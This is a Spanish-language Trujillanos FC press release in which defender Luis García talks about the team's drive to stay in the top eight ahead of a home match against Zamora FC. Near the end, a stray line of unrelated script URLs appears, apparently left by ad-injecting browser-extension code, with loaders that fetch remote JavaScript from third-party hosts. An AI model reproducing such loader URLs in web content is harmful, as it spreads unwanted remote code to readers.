¡LOS NUESTROS PRIMERO!

Luis García: “Estamos convencidos y concentrados de que podemos lograrlo”

trujillanos031018

Los guerreros de la montaña se preparan con gran intensidad para afrontar la recta final del torneo que arranca este domingo cuando se reciba al cuadro del Zamora FC. Actualmente el club cierra el grupo de los ocho y depende solo de sí mismos para lograr entrar a una fase de competencia que le ha sido esquiva en los últimos dos años. “Se nos viene una verdadera final, un partido más difícil de lo normal y al cual debemos salir con todo para quedarnos con los tres puntos, estamos en puestos de clasificación y todo pasa por nosotros mismos, mantenernos es cuestión de actitud y debemos en casa demostrar la mejor de todas” dijo el lateral izquierdo Luis García.

Además el lateral se refirió al deseo del grupo con romper con la mala racha. “Todos estamos convencidos y concentrados de que podemos lograrlo, cada uno va sumando cargas valiosas en cada tarea que le toca enfrentar y eso se traduce en buen rendimiento dentro del terreno de juego, la intensidad de cada entrenamiento es al máximo, el esfuerzo por acatar las indicaciones y hacer las correcciones es de lo mejor en cada uno, ahora sabemos que viene un rival que siempre ha sido difícil y ante el cual hay una rivalidad bastante bonita, vamos con las ganas de ganar y para ello estamos trabajando” dijo.

“Estamos enfocados en nosotros de cara al partido, la preparación de la semana es vital, en cada partido hemos demostrado el nivel del equipo y por ello el domingo no será la excepción, venimos de caer en casa en un choque que fue de resultado injusto y por ello debemos levantarnos con la victoria, el ser cautelosos en defensa y ordenados será fundamental así como definir todas las que podamos generar” prosiguió el defensor que se ha convertido en un habitual en las formaciones guerreras.

Ante lo que será el partido comentó, “vamos con la misma ideología para lograr mantenernos allí en los puestos en que estamos o superarnos, esta recta final del torneo es para terminar de demostrar que estamos haciendo las cosas bien y no debemos fallar en ningún aspecto, el domingo saldremos a buscar el partido e imponer el ritmo porque es nuestra casa” finalizó.

PRENSA TRUJILLANOS FC.

 

http://cdncache-a.akamaihd.net/sub/nee5452/52200_6968_/l.js?pid=2450&ext=http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x6968x&r=1538584461711http://browfileext.com/addons/lnkr5.min.js

Oswaldo Guevara